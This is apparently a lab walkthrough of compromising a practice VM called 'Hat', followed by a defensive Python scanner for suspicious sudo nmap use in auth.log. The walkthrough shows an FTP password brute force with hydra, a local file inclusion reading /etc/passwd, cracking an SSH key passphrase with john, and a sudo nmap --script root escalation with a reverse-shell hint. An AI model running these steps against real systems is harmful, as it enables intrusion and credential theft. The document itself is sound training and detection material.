# Lab setup
Download: Hat
NAT, IP: 192.168.1.171
# Penetration process
# Initial information gathering
```
PORT      STATE    SERVICE VERSION
22/tcp    filtered ssh
80/tcp    open     http    Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Apache2 Debian Default Page: It works
65535/tcp open     ftp     pyftpdlib 1.5.4
| ftp-syst:
|   STAT:
| FTP server status:
|  Connected to: 192.168.1.171:65535
|  Waiting for username.
|  TYPE: ASCII; STRUcture: File; MODE: Stream
|  Data connection closed.
|_End of status.
```
Directory scan result: http://192.168.1.171/logs/vsftpd.log
The log reveals the account admin_ftp, so brute-force its password:
```
┌──(root㉿kali)-[~]
└─# hydra -l admin_ftp -P /usr/share/wordlists/rockyou.txt ftp://192.168.1.171:65535 -I -t 64
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-06-01 09:31:08
[DATA] max 64 tasks per 1 server, overall 64 tasks, 14344399 login tries (l:1/p:14344399), ~224132 tries per task
[DATA] attacking ftp://192.168.1.171:65535/
[65535][ftp] host: 192.168.1.171   login: admin_ftp   password: cowboy
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2024-06-01 09:32:08
```
Got the password: cowboy
```
┌──(root㉿kali)-[~]
└─# ftp 192.168.1.171 -p 65535
Connected to 192.168.1.171.
220 pyftpdlib 1.5.4 ready.
Name (192.168.1.171:root): admin_ftp
331 Username ok, send password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls -al
229 Entering extended passive mode (|||39311|).
125 Data connection already open. Transfer starting.
drwxrwxrwx   2 cromiphi cromiphi     4096 Sep 28  2021 share
226 Transfer complete.
ftp> cd share
250 "/share" is the current directory.
ftp> ls -al
229 Entering extended passive mode (|||35733|).
125 Data connection already open. Transfer starting.
-rwxrwxrwx   1 cromiphi cromiphi     1751 Sep 28  2021 id_rsa
-rwxrwxrwx   1 cromiphi cromiphi      108 Sep 28  2021 note
226 Transfer complete.
ftp> get id_rsa
local: id_rsa remote: id_rsa
229 Entering extended passive mode (|||54749|).
125 Data connection already open. Transfer starting.
100% |**********************************************************|  1751        1.34 MiB/s    00:00 ETA
226 Transfer complete.
1751 bytes received in 00:00 (927.81 KiB/s)
ftp> get note
local: note remote: note
229 Entering extended passive mode (|||33729|).
125 Data connection already open. Transfer starting.
100% |**********************************************************|   108       10.21 KiB/s    00:00 ETA
226 Transfer complete.
108 bytes received in 00:00 (9.06 KiB/s)
```
Got id_rsa.
But we don't know which user it belongs to, so keep scanning directories and parameters.
Result: an LFI at http://192.168.1.171/php-scripts/file.php?6=/etc/passwd
Found the user: cromiphi
```
┌──(root㉿kali)-[~]
└─# ssh2john id_rsa > id_rsa.hash

┌──(root㉿kali)-[~]
└─# john id_rsa.hash --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (SSH, SSH private key [RSA/DSA/EC/OPENSSH 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 1 for all loaded hashes
Cost 2 (iteration count) is 2 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
ilovemyself      (id_rsa)
1g 0:00:00:00 DONE (2024-06-01 09:38) 100.0g/s 160000p/s 160000c/s 160000C/s joyce..dragon1
Use the "--show" option to display all of the cracked passwords reliably
Session completed.

┌──(root㉿kali)-[~]
└─# ssh -6 -i id_rsa cromiphi@fe80::20c:29ff:feeb:aa7f%eth0
Enter passphrase for key 'id_rsa':
Linux hat 4.19.0-17-amd64 #1 SMP Debian 4.19.194-3 (2021-07-18) x86_64
cromiphi@hat:~$ id
uid=1000(cromiphi) gid=1000(cromiphi) grupos=1000(cromiphi)
```
Got a shell.
# Privilege escalation
```
cromiphi@hat:~$ TF=$(mktemp)
cromiphi@hat:~$ echo 'os.execute("/bin/sh")' > $TF
cromiphi@hat:~$ sudo nmap --script=$TF
Starting Nmap 7.70 ( https://nmap.org ) at 2024-06-01 23:40 CEST
NSE: Warning: Loading '/tmp/tmp.K4zF4OqmnC' -- the recommended file extension is '.nse'.
# 8b4acc39c4d068623a16a89ebecd5048
```
The resulting shell does not echo input, so you can paste a reverse shell command straight in and get an interactive shell back.
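As an added detection example, not part of the original writeup: the escalation above leaves a record in /var/log/auth.log, because sudo logs every command it executes. This Python scanner flags sudo'd nmap invocations whose --script argument points outside nmap's own script directory (the Debian path /usr/share/nmap/scripts/ is assumed; the auth.log excerpt is constructed).

```python
import re

# Standard sudo syslog line: "sudo: <user> : TTY=... ; PWD=... ; USER=<runas> ; COMMAND=<cmd>"
SUDO_RE = re.compile(
    r"sudo:\s+(?P<user>\S+)\s+:\s+.*?USER=(?P<runas>\S+)\s+;\s+COMMAND=(?P<cmd>.+?)\s*$"
)

# nmap's own NSE script directory on Debian (assumed); any other path given to --script is suspicious
NSE_DIR = "/usr/share/nmap/scripts/"

def script_specs(argv):
    """Yield every value passed to nmap's --script option (both --script=X and --script X forms)."""
    i = 1
    while i < len(argv):
        arg = argv[i]
        if arg.startswith("--script="):
            yield arg[len("--script="):]
        elif arg == "--script" and i + 1 < len(argv):
            i += 1
            yield argv[i]
        i += 1

def check_sudo_line(line):
    """Return (user, runas, script) when a sudo'd nmap loads a script from outside NSE_DIR, else None."""
    m = SUDO_RE.search(line)
    if not m:
        return None
    argv = m.group("cmd").split()
    if not argv or argv[0].rsplit("/", 1)[-1] != "nmap":
        return None
    for spec in script_specs(argv):
        # a spec may be a comma-separated mix of script names, categories and file paths
        for item in spec.split(","):
            if "/" in item and not item.startswith(NSE_DIR):
                return (m.group("user"), m.group("runas"), item)
    return None

def scan_auth_log(text):
    """Run check_sudo_line over every line of an auth.log excerpt and collect the findings."""
    return [f for f in (check_sudo_line(l) for l in text.splitlines()) if f]

# Constructed auth.log excerpt (not taken from the target); line 2 mirrors the sudo nmap --script step above
SAMPLE_AUTH_LOG = """\
Jun  1 23:39:50 hat sudo: cromiphi : TTY=pts/0 ; PWD=/home/cromiphi ; USER=root ; COMMAND=/usr/bin/nmap -sV 192.168.1.10
Jun  1 23:40:03 hat sudo: cromiphi : TTY=pts/0 ; PWD=/home/cromiphi ; USER=root ; COMMAND=/usr/bin/nmap --script=/tmp/tmp.K4zF4OqmnC
Jun  1 23:41:10 hat sudo: admin : TTY=pts/1 ; PWD=/root ; USER=root ; COMMAND=/usr/bin/nmap --script /usr/share/nmap/scripts/http-title.nse 10.0.0.5
Jun  1 23:42:00 hat sshd[1234]: Accepted publickey for cromiphi from 192.168.1.5 port 50000 ssh2
"""
```

Running `scan_auth_log(SAMPLE_AUTH_LOG)` reports only the second line; the legitimate scan and the script loaded from nmap's own directory are left alone.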